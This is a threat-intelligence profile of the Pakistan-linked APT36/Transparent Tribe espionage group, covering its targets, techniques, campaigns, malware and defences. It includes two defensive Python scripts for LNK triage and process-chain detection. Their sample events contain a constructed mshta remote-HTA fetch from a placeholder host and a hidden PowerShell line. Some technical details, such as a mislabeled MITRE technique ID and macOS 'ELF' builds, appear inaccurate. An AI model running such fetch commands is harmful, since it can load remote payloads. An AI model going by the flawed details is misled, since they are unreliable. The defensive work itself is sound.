Transparent Tribe / APT36
Pakistan's primary assessed offensive cyber espionage unit, conducting sustained long-term intelligence collection against Indian government, military, defense contractors, and academic institutions since at least 2013. Not particularly sophisticated in tradecraft, but exceptionally persistent and geopolitically aware — Transparent Tribe continuously adapts its tooling and delivery methods to maintain persistent access inside Indian systems.
Overview
Transparent Tribe is a Pakistan-nexus advanced persistent threat group conducting cyber espionage operations almost exclusively against Indian government, military, defense, and academic targets. The group has been active since at least 2013, though it was first publicly identified by Proofpoint researchers in early 2016 during a series of intrusions targeting Indian diplomats and military personnel stationed in embassies in Saudi Arabia and Kazakhstan. Those early campaigns revealed spear-phishing delivery of two custom RATs — Crimson and Peppy — capable of screen capture, file exfiltration, and webcam recording.
Attribution to Pakistan-based actors emerged through operational security failures: Unit 42 researchers traced domain registration activity to real individuals with verifiable Pakistani connections. The group is widely assessed to operate in support of Pakistan's Inter-Services Intelligence (ISI), though direct formal links to any specific Pakistani government entity have not been publicly confirmed. Transparent Tribe's operations are geopolitically focused, targeting sectors that would provide strategic, military, or diplomatic intelligence advantage to the Pakistani state relative to India.
Unlike many top-tier nation-state actors, Transparent Tribe is not regarded as technically sophisticated. The group does not rely on zero-days or complex exploitation chains. Instead, it depends on persistent social engineering, convincing lures built around real-world geopolitical events, and a continuously evolving custom malware arsenal. When one delivery method or tool variant gets detected and burned, the group rebuilds its approach and continues targeting the same organizations. This pattern of persistence over sophistication has made the group a sustained, long-term threat to India's national security infrastructure.
Over the past decade, Transparent Tribe has progressively expanded its targeting scope and platform coverage. Campaigns originally confined to Windows environments now extend to Android devices via CapraRAT and to Linux environments via Poseidon and weaponized .desktop files — directly targeting BOSS Linux, the distribution widely deployed across Indian government agencies. The group also runs Android spyware campaigns using fake social applications to surveil individuals outside traditional network perimeters.
Target Profile
Transparent Tribe's targeting is tightly focused on India, with secondary opportunistic interest in Afghanistan, Pakistan's civil society and activists, and a small number of other countries. The group identifies individuals and organizations that would yield intelligence of direct strategic value to Pakistani state interests.
- Indian Government Entities: Central government agencies, ministries, and their personnel are the group's primary target. Lures regularly impersonate official Indian government portals, documents, and email communications. The Indian Air Force (IAF) and defense procurement bodies have been targeted in documented campaigns.
- Military & Defense: Military personnel, defense contractors, and aerospace defense organizations are persistently targeted. In one cluster of activity, APT36 deployed ISO-based lures specifically crafted around IAF naming conventions and exercise themes, including lures referencing the Tarang Shakti-2024 exercise.
- Academic and Research Institutions: The group began sustained targeting of Indian universities and education sector entities from approximately 2022 onward. Malicious Office documents delivered via OLE embedding were observed in campaigns specifically aimed at students and academic staff, assessed as an attempt to build intelligence about defense research pipelines.
- Diplomatic Personnel: Indian diplomatic personnel at overseas postings have been targeted since the group's earliest confirmed campaigns, with spear-phishing campaigns designed around the workflows and document types used by Indian diplomatic missions.
- Critical Infrastructure: More recent CYFIRMA reporting from 2025 documents broadened interest in Indian critical infrastructure targets alongside the continued government and defense focus.
- Pakistani Activists and Civil Society: The group has also targeted Pakistani civil society members and activists, assessed as domestic surveillance activity aligned with Pakistani state interests.
Tactics, Techniques & Procedures
Documented TTPs based on observed campaigns and public threat intelligence through early 2026. Transparent Tribe relies heavily on social engineering and custom RATs over technical exploitation, but has demonstrated adaptive evasion capability as defensive tooling has evolved.
| MITRE ID | Technique | Description |
|---|---|---|
| T1566.001 | Spearphishing Attachment | Primary initial access vector. Lures use malicious PDFs, Office documents (including PPAM macros), ZIP archives, ISO images, and LNK files. Document themes exploit real-world events including border tensions, terror attacks, military exercises, and government advisories. |
| T1566.002 | Spearphishing Link | Malicious URLs distributed via phishing emails and malvertising campaigns using Google Ads. Links direct targets to attacker-controlled infrastructure impersonating Indian government portals including the Kavach MFA portal. |
| T1583.001 | Domain Acquisition | APT36 registers domains closely mimicking official Indian government sites, payment authorities, and military portals, often including character substitutions or added keywords. Some domains are created within days of real-world events to maximize lure credibility. |
| T1027 | Obfuscated Files or Information | Malware payloads are encoded, packed, and encrypted. LNK-based campaigns embed full decoy PDF content within oversized shortcut files (2MB+) to disguise the true file type. HTA scripts use ActiveX objects to decrypt and load RAT payloads in memory. |
| T1059.001 | PowerShell Execution | PowerShell is used in multi-stage infection chains, particularly in LNK-based delivery. Fileless execution via PowerShell is used to avoid writing payloads to disk, reducing the footprint visible to signature-based detection. |
| T1218.005 | Mshta Execution | Recent campaigns (2025–2026) use mshta.exe to execute remote HTML Application (HTA) scripts fetched from attacker infrastructure. The HTA decrypts and loads the final RAT payload directly in memory while displaying a decoy PDF to the user. |
| T1547.001 | Registry Run Keys / Startup Folder | Malware establishes persistence via Registry Run keys and startup folder entries. In antivirus-aware variants observed in late 2025, the persistence mechanism adapts based on which AV product is detected on the host — selecting from Kaspersky, Quick Heal, Avast, AVG, or Avira-aware paths. |
| T1071.001 | Web Protocols for C2 | ElizaRAT variants use cloud services including Telegram, Google Drive, Slack, and Firebase for C2 communication, embedding malicious traffic within legitimate platform traffic to evade network-layer detection. Earlier Crimson RAT variants used traditional attacker-controlled VPS infrastructure. |
| T1119 | Automated Collection | Deployed RATs automatically collect screenshots, keystrokes, file listings, and system information. ElizaRAT variants use SQLite databases to stage collected data locally before exfiltration. ApoloStealer catalogs and exfiltrates document files including Office documents, PDFs, and databases. |
| T1497.003 | Time-Based Evasion | ElizaRAT and related implants include a hardcoded check for India Standard Time (IST) as an initial execution condition. Samples that detect a time zone other than IST exit silently, limiting exposure during analysis in non-Indian environments. |
| T1036.005 | Masquerading: Match Legitimate Name or Location | Malicious files are named after legitimate documents, government advisories, exam materials, and military circulars. On Linux, .desktop files are configured with PDF icons and mimicked filenames to disguise their nature. |
| T1472 | Exploit Public-Facing Application | The group distributes trojanized versions of legitimate Indian government software, notably a backdoored version of the Kavach two-factor authentication application used by Indian government agencies to access email services. |
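As an added example (not from the original profile or any vendor's signature), a Python triage script that flags the shortcut traits described in the T1027 and T1036.005 rows above; the 2 MB threshold, the embedded-PDF magic check and the sample filenames are assumptions constructed for the demonstration.

```python
"""Triage .lnk files for the traits in the T1027 / T1036.005 rows: an oversized
shortcut (2 MB+), decoy PDF content embedded after the shortcut header, and a
double-extension name such as document.pdf.lnk. Sample files are constructed."""
import os
import struct
import tempfile

LNK_HEADER_SIZE = 0x4C                       # fixed ShellLinkHeader size (MS-SHLLINK)
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # LinkCLSID field
PDF_MAGIC = b"%PDF-"
OVERSIZE_BYTES = 2 * 1024 * 1024             # assumed threshold, from the "2MB+" note
DOC_EXTS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx")

def is_lnk(data: bytes) -> bool:
    """True if the bytes begin with a well-formed ShellLinkHeader."""
    if len(data) < LNK_HEADER_SIZE:
        return False
    header_size = struct.unpack_from("<I", data, 0)[0]
    return header_size == LNK_HEADER_SIZE and data[4:20] == LNK_CLSID

def triage_lnk(path: str) -> dict:
    """Return the suspicious traits seen in one file (empty list means none)."""
    with open(path, "rb") as fh:
        data = fh.read()
    name = os.path.basename(path).lower()
    findings = []
    if not name.endswith(".lnk") and not is_lnk(data):
        return {"path": path, "is_lnk": False, "findings": findings}
    stem = name[:-4] if name.endswith(".lnk") else name
    if stem.endswith(DOC_EXTS):                 # e.g. notice.pdf.lnk
        findings.append("double_extension")
    if len(data) >= OVERSIZE_BYTES:
        findings.append("oversized_shortcut")
    pdf_at = data.find(PDF_MAGIC)
    if pdf_at >= LNK_HEADER_SIZE:               # PDF body carried inside the shortcut
        findings.append(f"embedded_pdf_at_{pdf_at}")
    return {"path": path, "is_lnk": True, "findings": findings}

def scan_dir(root: str) -> list:
    """Walk root and return results only for files that raised at least one finding."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for f in sorted(files):
            result = triage_lnk(os.path.join(dirpath, f))
            if result["findings"]:
                hits.append(result)
    return hits

def build_samples(root=None) -> str:
    """Write constructed samples: a benign shortcut, a real PDF, and a lure-shaped
    shortcut (constructed name, not a real campaign file). Returns the directory."""
    root = root or tempfile.mkdtemp()
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + b"\0" * (LNK_HEADER_SIZE - 20)
    with open(os.path.join(root, "notes.lnk"), "wb") as fh:
        fh.write(header + b"\0" * 200)
    with open(os.path.join(root, "report.pdf"), "wb") as fh:
        fh.write(b"%PDF-1.7\n%real document\n")
    with open(os.path.join(root, "JLPT_Exam_Schedule.pdf.lnk"), "wb") as fh:
        fh.write(header + b"\0" * 100 + b"%PDF-1.7 decoy" + b"\0" * OVERSIZE_BYTES)
    return root

if __name__ == "__main__":
    for hit in scan_dir(build_samples()):
        print(hit["path"], hit["findings"])
```

Point scan_dir at a user's Downloads or mail attachment folder to apply the same checks to real files; a hit is a triage signal, not proof of compromise.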
Known Campaigns
Confirmed or highly attributed operations linked to Transparent Tribe, based on public threat intelligence reporting.
The foundational campaign establishing the group's profile. Proofpoint and Trend Micro researchers identified spear-phishing operations targeting Indian diplomatic and military personnel in embassies across Saudi Arabia and Kazakhstan. The campaign delivered custom RATs — Crimson and Peppy — capable of screen capture, webcam recording, and file exfiltration. OPSEC failures during domain registration led Unit 42 to trace infrastructure to Pakistani individuals, producing the group's initial attribution to Pakistan.
Transparent Tribe began explicitly targeting Indian academic and educational institutions with Crimson RAT delivered via malicious Office documents. SentinelOne and Cisco Talos tracked the group introducing OLE embedding techniques for malware staging — a technical adaptation to existing detection controls — alongside versioned updates to the Crimson RAT implementation, demonstrating active development of the toolset during the period.
APT36 distributed backdoored versions of Kavach, the mandatory two-factor authentication application used by Indian government agencies for email access. Malicious sites impersonating the legitimate Kavach portal served trojanized installers that delivered Poseidon as a second-stage Linux payload. Poseidon — a Golang agent built on the open-source Mythic C2 framework — provided full remote access including keylogging, screen capture, file upload and download, and arbitrary command execution. The campaign marked APT36's deliberate expansion into Linux environments targeting BOSS Linux users.
Check Point Research tracked three distinct ElizaRAT campaign variants (Slack, Circle, and Google Drive) deployed against high-profile Indian targets through late 2023 and into 2024. Each variant used CPL file droppers distributed via Google Storage links. Unique characteristics include hardcoded India Standard Time zone checks, per-victim ID generation, and SQLite-based local staging of stolen data. The Google Drive campaign introduced ApoloStealer — a second-stage payload dedicated to cataloging and exfiltrating document files — representing a shift toward modular, flexible payload deployment.
BlackBerry identified a cluster of Transparent Tribe activity from late 2023 to April 2024, targeting Indian government, defense, and aerospace sectors with cross-platform tools. The group used Python and Golang ELF binaries, cloud abuse via Telegram, Discord, Slack, and Google Drive, and ISO-based lures themed around Indian Air Force exercises including Tarang Shakti-2024. APT36 was assessed to be actively monitoring Indian aerospace defense modernization efforts.
APT36 abused Google Ads to promote malicious domains impersonating India's official Kavach MFA portal, directing government employees to sites that harvested credentials and served backdoored Kavach applications delivering Crimson RAT and a newly identified exfiltration tool named Limepad. The campaign demonstrated APT36's adoption of paid advertising infrastructure as a delivery mechanism, targeting users who searched for the legitimate tool.
Within days of the April 22, 2025 Pahalgam terror attack in Jammu & Kashmir, APT36 created fake domains impersonating the Jammu & Kashmir Police and the Indian Air Force to distribute phishing PDFs and macro-laced documents. The campaign targeted Indian government and defense personnel with Crimson RAT, exploiting the high-urgency news environment to encourage rapid opening of lure documents. This campaign exemplifies APT36's pattern of using real-world geopolitical events as lure themes within days of their occurrence.
Security researchers identified a significant expansion of APT36's Linux targeting through mid-2025, with campaigns using malicious .desktop files disguised as government meeting notices, cyber security advisories, and income tax correspondence. Lures delivered a Go-based ELF implant (BOSS.elf) alongside Poseidon payloads connected to Mythic C2 infrastructure hosted on DigitalOcean. The campaign directly targeted the BOSS Linux distribution deployed across Indian government agencies, marking a deliberate focus on the specific OS used by the group's primary targets.
CYFIRMA and The Hacker News documented a December 2025 campaign using oversized weaponized Windows LNK files disguised as exam documents and government advisories — including lures referencing JLPT exams and NCERT WhatsApp advisories. The LNK files embed complete decoy PDF content to avoid user suspicion. When executed, mshta.exe fetches an HTA script that decrypts and loads a .NET RAT directly in memory while displaying the decoy PDF. The RAT implements antivirus-aware persistence, adapting its Registry key strategy based on the detected AV product on the host.
Tools & Malware
Known custom and commodity tools associated with Transparent Tribe across observed campaigns. The group continuously updates and versions its custom tools while also incorporating open-source frameworks.
- Crimson RAT: The group's primary and longest-used Windows remote access trojan. Written in .NET, Crimson provides keylogging, screen capture, remote command execution, file operations, and process listing. Delivered via malicious Office documents with VBA macros, malicious PDFs, and spear-phishing attachments. Actively developed with versioned updates observed through 2025. Mutex: GlobalCrimsonRAT_Active.
- ElizaRAT: A .NET-based Windows RAT first publicly disclosed in September 2023. Dropped via malicious Control Panel (.CPL) files distributed through Google Storage links. Key characteristics include IST time zone checks before execution, per-victim ID generation, SQLite-based local data staging, and cloud-platform C2 — with variants using Telegram, Google Drive, Slack, and VPS servers for command and control. Observed in at least three distinct campaign variants (SlackAPI, Circle, Google Drive) through 2024.
- ApoloStealer: A second-stage Windows payload introduced in ElizaRAT campaigns in 2024. Dedicated to cataloging and exfiltrating document files from compromised systems, including Office documents, PDFs, and database files. Represents a modular expansion of the ElizaRAT payload architecture.
- CapraRAT: An Android spyware implant based on a modified version of the open-source AndroRAT. Distributed inside fake chat applications and social apps — observed impersonating YouTube, Viber, and other popular applications. Capabilities include SMS and contact theft, microphone and camera access, GPS location tracking, call recording, and message interception. Infrastructure is frequently hosted via Contabo VPS services.
- Poseidon: A Golang-based agent derived from the open-source Mythic C2 framework's Poseidon module, compiling into Linux and macOS x64 ELF executables. Provides keylogging, screen capture, file upload and download, and remote system administration. Used as a second-stage payload delivered via trojanized Kavach installers and malicious .desktop files targeting BOSS Linux systems.
- Limepad: A document exfiltration tool identified in 2024–2025 Kavach malvertising campaigns alongside Crimson RAT. Functions as a stealer payload targeting government employee credentials and documents.
- ObliqueRAT: An older Windows RAT sometimes deployed alongside Crimson RAT, known to be distributed through compromised websites or hidden within image files. Observed in earlier campaigns and less prominent in 2024–2026 activity.
- Peppy RAT: One of the two original RATs deployed in Operation Transparent Tribe (2016). Documented capabilities include screen capture and webcam recording. Largely superseded by newer tooling in subsequent campaigns.
- BOSS.elf (Go-based ELF implant): A Go-based Linux backdoor observed in mid-2025 campaigns targeting BOSS Linux government systems. Delivered via .desktop file lures; connects to C2 infrastructure and runs persistently using nohup to avoid user detection while displaying a decoy LibreOffice presentation.
Indicators of Compromise
Publicly reported IOCs from research disclosures. Verify currency before operational use — infrastructure rotates frequently and burned IOCs may already be decommissioned.
IOCs may be stale or burned after public disclosure. APT36 rotates infrastructure regularly, including VPS providers, domains, and C2 endpoints. Cross-reference with live threat intel feeds including VirusTotal, MISP, and vendor-maintained IOC feeds before blocking.
Mitigation & Defense
Recommended defensive measures for organizations in Transparent Tribe's target profile — primarily Indian government agencies, defense entities, academic institutions, and their third-party vendors.
- Block LNK and Script Execution from User-Writable Paths: Restrict execution of .LNK, HTA, VBScript, and PowerShell files launched from user-writable directories. Configure Windows to display full file extensions to surface double-extension masquerading such as document.pdf.lnk.
- Monitor Abnormal Process Chains: Alert on mshta.exe, powershell.exe, wscript.exe, or cmd.exe spawned from shortcut files or Office applications. These process chains are consistent with APT36 delivery patterns across multiple campaign generations.
- Verify Software Sources for Government Applications: Indian government employees should download Kavach and other government applications exclusively from official .gov.in domains. Deploy endpoint controls to block installation from unofficial sources and alert on trojanized application behavior.
- Deploy Mobile Threat Defense: CapraRAT campaigns target Android devices. Mobile threat defense solutions capable of detecting sideloaded APKs with known malicious package names (com.kavach.update.apk, com.moves.media.tubes) should be deployed for users in target sectors.
- Cloud C2 Traffic Inspection: ElizaRAT uses Telegram, Google Drive, and Slack for C2. Inspect cloud service traffic for anomalous patterns — high-frequency polling, unusual API call sequences, or data transfer to cloud services from government systems that do not normally use these platforms.
- SIEM and EDR Behavioral Signatures: Integrate YARA rules and behavioral signatures from APT36 public disclosures (CYFIRMA, Check Point, BlackBerry, SentinelOne) into SIEM and EDR platforms. Monitor for SQLite database creation in %appdata% directories consistent with ElizaRAT staging behavior.
- IST Time Zone Evasion Awareness: Analysis of APT36 samples should be conducted in environments configured to India Standard Time, as ElizaRAT and related implants perform time zone checks and exit silently in non-IST environments.
- Linux Desktop File Controls: On BOSS Linux and other government Linux deployments, restrict execution of .desktop files from downloaded or archive sources. Train users to recognize that legitimate government documents do not arrive as .desktop files.
- Geopolitical Event Monitoring for Lure Awareness: APT36 consistently deploys lure campaigns within days of significant geopolitical events. Security teams should raise phishing awareness and email scrutiny in the days following major India-Pakistan geopolitical events, terror incidents, or military exercises.
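As an added example (not from the original profile or any vendor's rule set), Python detection logic that applies the "Monitor Abnormal Process Chains" guidance above to constructed process-creation events; the event field names, hostnames, paths and the placeholder URL are assumptions, and the rule for a remote HTA fetch by mshta.exe follows the T1218.005 row in the TTP table.

```python
"""Flag process-creation chains matching the APT36 delivery pattern described in
the mitigation list: mshta.exe / powershell.exe / wscript.exe / cmd.exe spawned by
Office applications or by explorer.exe (the parent of a double-clicked shortcut),
and mshta.exe fetching a remote HTA. Input events are constructed samples in the
shape of EDR/Sysmon process-creation records."""
import re
from typing import Dict, List

SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cmd.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)

def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the names of the detection rules this single event matches."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    parent = event["parent_image"].rsplit("\\", 1)[-1].lower()
    cmdline = event.get("command_line", "")
    matched = []
    if image not in SCRIPT_HOSTS:
        return matched
    if parent in OFFICE_APPS:
        matched.append("office_spawns_script_host")          # macro / OLE lure detonated
    if parent == "explorer.exe" and (URL_RE.search(cmdline) or HIDDEN_RE.search(cmdline)):
        matched.append("explorer_spawns_hidden_or_remote")    # consistent with a clicked .lnk
    if image == "mshta.exe" and URL_RE.search(cmdline):
        matched.append("mshta_remote_hta")                    # T1218.005 remote HTA fetch
    return matched

def run(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Evaluate every event and return only those that matched at least one rule."""
    alerts = []
    for ev in events:
        rules = evaluate(ev)
        if rules:
            alerts.append({"host": ev["host"], "image": ev["image"], "rules": rules})
    return alerts

# Constructed sample telemetry; hostnames, paths and the URL are placeholders, not real IOCs.
SAMPLE_EVENTS = [
    {"host": "ws01", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe https://lure.example.invalid/advisory.hta"},
    {"host": "ws02", "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -w hidden -nop -c stage2_placeholder"},
    {"host": "ws03", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "command_line": "chrome.exe"},
    {"host": "ws04", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c dir"},                       # ordinary console use, no rule fires
]

if __name__ == "__main__":
    for alert in run(SAMPLE_EVENTS):
        print(alert["host"], alert["image"], ", ".join(alert["rules"]))
```

Feed real process-creation records with the same three fields to run() to use it as a SIEM correlation prototype; tune OFFICE_APPS and the explorer.exe rule against the baseline of the environment before alerting on them.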
Transparent Tribe's defining characteristic is persistence over sophistication. Attribution to Pakistan remains an assessed finding based on OPSEC failures and geopolitical alignment, not confirmed through official government disclosure. Some researchers note that the group's infrastructure choices, operational timing, and targeting are consistent with state interests, while others caution that the public evidence directly linking the group to a specific Pakistani government agency remains circumstantial. The threat level to Indian government and defense organizations is high regardless of formal attribution, given the group's decade-plus operational record and continuous tooling evolution through early 2026.
Sources & Further Reading
Attribution and references used to build this profile.
- MITRE ATT&CK — Transparent Tribe Group G0134
- Check Point Research — Cloudy With a Chance of RATs: ElizaRAT Evolution (2024)
- BlackBerry — Transparent Tribe Targets Indian Government, Defense, and Aerospace (2024)
- SentinelOne Labs — APT36 Expands Interest in Indian Education Sector (2025)
- CYFIRMA — APT Profile: Transparent Tribe aka APT36 (2025)
- Uptycs — Decoding APT-36's New Linux Malware: Poseidon (2023)
- CloudSEK — APT36 Returns With CapraRAT Impersonating Viber (2025)
- The Hacker News — Transparent Tribe Launches New RAT Attacks (2026)
- Security Affairs — APT36 Abuses Linux .desktop Files (2025)
- SOCRadar — Dark Web Profile: APT36 (2025)